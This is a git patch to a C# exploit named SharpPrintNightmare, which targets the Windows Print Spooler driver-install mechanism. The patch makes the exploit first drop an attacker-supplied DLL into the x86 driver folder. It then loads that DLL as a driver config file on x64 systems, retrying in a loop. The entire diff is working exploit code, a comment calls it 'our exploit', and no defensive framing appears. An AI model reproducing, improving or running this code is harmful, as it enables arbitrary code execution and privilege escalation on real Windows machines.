From 2caad3a1bc1d4f33e6fa8b79fc74c1b639009394 Mon Sep 17 00:00:00 2001
From: testanull <jangpro.net@gmail.com>
Date: Sat, 3 Jul 2021 14:56:09 +0700
Subject: [PATCH] Drop file to x86 folder then load with x64

---
 .../SharpPrintNightmare/Program.cs            | 20 +++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)

diff --git a/SharpPrintNightmare/SharpPrintNightmare/Program.cs b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
index a03d26c..46359e2 100644
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -117,16 +117,20 @@ namespace SharpPrintNightmare
 
             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
+            string pDriverPathX86 = pDriverPath.Replace("ntprint.inf_amd64", "ntprint.inf_x86");
+            pDriverPathX86 = pDriverPathX86.Replace("Amd64", "I386");
+            
             Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+            Console.WriteLine($"[*] pDriverPathX86 {pDriverPathX86}");
             Console.WriteLine($"[*] Executing {dllpath}");
 
-            //DRIVER_INFO_2 Level2 = drivers[0]; // debug
+            //First drop to x86 folder
             DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
             Level2.cVersion = 3;
-            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+            Level2.pConfigFile = "C:\\Windows\\SysWOW64\\kernelbase.dll";
             Level2.pDataFile = dllpath;
-            Level2.pDriverPath = pDriverPath;
-            Level2.pEnvironment = "Windows x64";
+            Level2.pDriverPath = pDriverPathX86;
+            Level2.pEnvironment = "Windows NT x86";
             Level2.pName = "12345";
 
             string filename = Path.GetFileName(dllpath);
@@ -143,8 +147,12 @@ namespace SharpPrintNightmare
 
             for (int i = 1; i <= 30; i++)
             {
-                //add path to our exploit
-                Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
+                //Then load it
+                Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+                Level2.pDriverPath = pDriverPath;
+                Level2.pEnvironment = "Windows x64";
+                Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\W32X86\\3\\{filename}";
+                
                 //convert struct to unmanage code
                 IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
                 Marshal.StructureToPtr(Level2, pnt2, false);